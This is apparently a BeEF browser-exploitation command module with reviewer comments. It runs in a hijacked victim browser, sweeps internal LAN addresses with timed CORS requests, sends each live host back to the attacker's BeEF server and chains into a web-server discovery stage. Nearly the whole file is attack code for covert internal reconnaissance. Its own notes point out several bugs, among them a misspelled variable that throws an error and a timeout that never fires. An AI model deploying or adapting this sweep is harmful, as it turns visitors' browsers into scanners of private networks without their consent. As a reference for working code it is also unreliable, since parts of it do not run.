notes on the BeEF dormant domination work
// BeEF command module ("ping sweep"): from the hooked browser, issues one timed CORS request
// per target address and reports each result back to the BeEF server through
// beef.aredormanthelpers.queue. mod_input is either the literal 'common' (built-in address
// list) or a "A.B.C.D-A.B.C.E" range string whose last octet is iterated.
// Everything below runs inside beef.execute; there is no return value.
var ping_sweep_68a01c7d83 = function(mod_input){
beef.execute(function() {
var ips = new Array();
var rhosts = mod_input;
// "6" is a template-substituted literal, so this is always 6 and the `|| 3` fallback is dead code.
var threads = parseInt("6", 10) || 3;
// Milliseconds; doubles as the worker tick interval and as the per-request CORS timeout.
var timeout = 1000;
if(!beef.browser.hasCors()) {
beef.aredormanthelpers.queue('/command/ping_sweep.js', 1, 'fail=Browser does not support CORS', beef.are.status_error());
return;
}
// set target IP addresses
if (rhosts == 'common') {
// use default IPs
ips = [
'192.168.0.1',
'192.168.0.100',
'192.168.0.254',
'192.168.1.1',
'192.168.1.100',
'192.168.1.254',
'10.0.0.1',
'10.1.1.1',
'192.168.2.1',
'192.168.2.254',
'192.168.100.1',
'192.168.100.254',
'192.168.123.1',
'192.168.123.254',
'192.168.10.1',
'192.168.10.254'
];
} else {
// set target IP range
// NOTE(review): the pattern is a plain single-quoted string, so '\.' reaches the RegExp as '.'
// (any character) and '\-' as '-'; the octet alternations are enforced but the separators are not.
var range = rhosts.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
if (range == null || range[1] == null) {
beef.aredormanthelpers.queue("/command/ping_sweep.js", 1, "fail=malformed IP range supplied", beef.are.status_error());
return;
}
// NOTE(review): ipBounds, lowerBound, upperBound and ipToTest are never declared, so they
// become implicit globals on the hooked page.
ipBounds = rhosts.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
// NOTE(review): both bounds are strings, so the first `i <= upperBound` test is a lexicographic
// string comparison; only after the first i++ does the comparison become numeric.
for (var i = lowerBound; i <= upperBound; i++){
// Only the last octet of the lower bound is varied; the first three octets of the upper bound are ignored.
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
}
// WorkerQueue: a FIFO of JavaScript source strings, one of which is executed every `frequency` ms
// while the queue is non-empty. Assigned without var/let, so this constructor is an implicit global.
WorkerQueue = function(frequency) {
var stack = [];
var timer = null;
var frequency = frequency; // redundant re-declaration of the parameter; no effect
var start_scan = (new Date).getTime();
this.process = function() {
var item = stack.shift();
// NOTE(review): each queued item is a dynamically concatenated source string run through eval.
eval(item);
if (stack.length === 0) {
clearInterval(timer);
timer = null;
var interval = (new Date).getTime() - start_scan;
beef.debug("[Ping Sweep] Worker queue is complete ["+interval+" ms]");
return;
}
}
this.queue = function(item) {
stack.push(item);
// process closes over stack/timer and never reads `this`, so passing it unbound to setInterval is safe here.
if (timer === null) timer = setInterval(this.process, frequency);
}
}
// create workers
var workers = new Array();
for (w=0; w < threads; w++) workers.push(new WorkerQueue(timeout)); // `w` is another implicit global
beef.debug("[Ping Sweep] Starting scan ("+(ips.length)+" URLs / "+threads+" workers)");
// Round-robin the addresses across the workers. `var i` re-declares the loop variable used above
// (same function scope after hoisting); harmless because that loop has finished.
for (var i=0; i < ips.length; i++) {
var worker = workers[i % threads];
var ip = ips[i];
// use a high port likely to be closed/filtered (60000 - 65000)
var port = Math.floor(Math.random() * 5000) + 60000;
// The queued string records a start time, fires one CORS GET at https://ip:port/ with `timeout` ms,
// and on callback classifies the host by whether the round trip finished under `timeout`;
// a "host is up" verdict is posted back with beef.aredormanthelpers.queue, a timeout is only logged.
worker.queue('var start_time = new Date().getTime();' +
'beef.net.cors.request(' +
'"GET", "https://'+ip+':'+port+'/", "", '+timeout+', function(response) {' +
'var current_time = new Date().getTime();' +
'var duration = current_time - start_time;' +
'if (duration < '+timeout+') {' +
'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- host is up");' +
'beef.aredormanthelpers.queue("/command/ping_sweep.js", 1, "ip='+ip+'&ping="+duration+"ms", beef.are.status_success());' +
'} else {' +
'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- timeout");' +
'}' +
'});'
);
}
});
};
// Chaining state for the ping-sweep stage, read and written by
// outer_sequential_68a01c7d83 below: the reported module output (null until the
// result poller stores it) and an execution gate that nothing in this file reads
// (presumably consumed by a sibling script; confirm against the harness).
var ping_sweep_68a01c7d83_mod_output = null;
var ping_sweep_68a01c7d83_can_exec = false;
// Sequencer installed on the Beefaredormant instance at the bottom of the file.
// Runs the ping sweep on a range derived from the previous stage's output, polls
// ping_sweep_68a01c7d83_mod_output every 300 ms for its result and, once a result is
// seen, chains into get_http_servers_5d82b59a5c.
// stealthLevel: when > 1 the pending beef.commands are drained by hand (see below).
function outer_sequential_68a01c7d83(stealthLevel){
function ping_sweep_68a01c7d83_f(){
//CODE
//var s=mod_input.split('.');
//var start = s[0]+'.'+s[1]+'.0.67';
//var end = s[0]+'.'+s[1]+'.0.71';
//var mod_input = start+'-'+end;
// `var mod_input` on the next line is hoisted, so this assigns the local, not a global.
mod_input = "";
// Builds a four-address range (.117-.120) inside the /24 of outer_sequential_mod_output,
// which is not declared in this file — presumably set by the preceding stage; confirm.
var s=outer_sequential_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.117'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.120'; var mod_input = start+'-'+end;
ping_sweep_68a01c7d83(mod_input);
if (stealthLevel > 1) {
// manually pop beef modules because we killed the timer
while(beef.commands.length > 0) {
command = beef.commands.pop(); // implicit global
try {
command();
} catch(e) {
beef.debug('dormant - failed to execute ' + e.message);
beef.debug(command.toString());
}
}
} /* CF MOD FROM HERE */
// Poll callback. mod_result: current value of ping_sweep_68a01c7d83_mod_output;
// start: a timestamp used for the 5000 ms budget. Returns nothing.
function isResReady(mod_result, start){
if (mod_result === null && parseInt(((new Date().getTime()) - start)) < 5000){
// loop
}else{
// module return status/data is now available
clearInterval(resultReady);
// Reached with a null result only when the budget is spent; `&& true` is a no-op and
// `var mod_result` re-declares the parameter (the assignment simply reassigns it).
if (mod_result === null && true){
var mod_result = [];
mod_result[0] = 1; //unknown status
mod_result[1] = '' //empty result
}
// NOTE(review): presumably mod_output holds a [status, data] pair when non-null — confirm against the harness.
var status = mod_result[0];
if(status==1){
get_http_servers_5d82b59a5c_can_exec = true; // implicit global; read by get_http_servers_5d82b59a5c_f below
ping_sweep_68a01c7d83_mod_output = mod_result[1];
// END OF THE FIRST ITERATION OF ADDING CONTENT TO
// delayed_exec
// START OF LAST ITERATION (else) OF ADDING CONTENT TO
// delayed_exec
function get_http_servers_5d82b59a5c_f(){
if(get_http_servers_5d82b59a5c_can_exec){
// NOTE(review): this identifier does not match ping_sweep_68a01c7d83_mod_output declared above;
// as written it is an unresolved name, so this statement throws a ReferenceError.
var s=ping_sweep_68a01c7d83_mod_outpu .split('.');
var start = s[0]+'.'+s[1]+'.1.89';
var end = s[0]+'.'+s[1]+'.1.91';
var mod_input = start+'-'+end;
get_http_servers_5d82b59a5c(mod_input);
}
}
get_http_servers_5d82b59a5c_f();
// END OF LAST ITERATION (else) OF ADDING CONTENT TO
// delayed_exec
// START OF FIRST ITERATION OF ADDING delayed_exec_footer
}
}
}
var start = (new Date()).getTime();
// NOTE(review): the callback re-declares `start` on every tick, so the elapsed time handed to
// isResReady is always ~0 and the 5000 ms budget never expires; polling stops only when
// ping_sweep_68a01c7d83_mod_output becomes non-null. The outer `start` above is unused.
var resultReady = setInterval(function() {
var start = (new Date()).getTime();
isResReady(ping_sweep_68a01c7d83_mod_output, start);
},300);
/* CF MOD END HERE */
}
ping_sweep_68a01c7d83_f();
}
// Registers the sequencer with BeEF's dormant runner. Assigned without var/let, so
// are_68a01c7d83 is an implicit global; Beefaredormant comes from BeEF, not this file.
// NOTE(review): the meaning of the (2, 1) constructor arguments is not visible here — confirm
// against the Beefaredormant definition.
are_68a01c7d83 = new Beefaredormant(2, 1);
are_68a01c7d83.outer_sequential = outer_sequential_68a01c7d83;